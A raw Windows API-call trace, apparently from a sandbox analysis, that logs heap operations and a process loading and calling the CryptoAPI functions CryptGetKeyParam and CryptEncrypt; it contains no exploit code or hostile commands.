0x43e27f0 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0122.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.636] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0122.637] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0122.637] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0122.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0122.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0122.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0122.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0122.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0122.641] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0122.641] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e27f0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e27f0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0122.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.643] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0122.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.644] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.644] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0122.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0122.645] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac10, cbMultiByte=13, 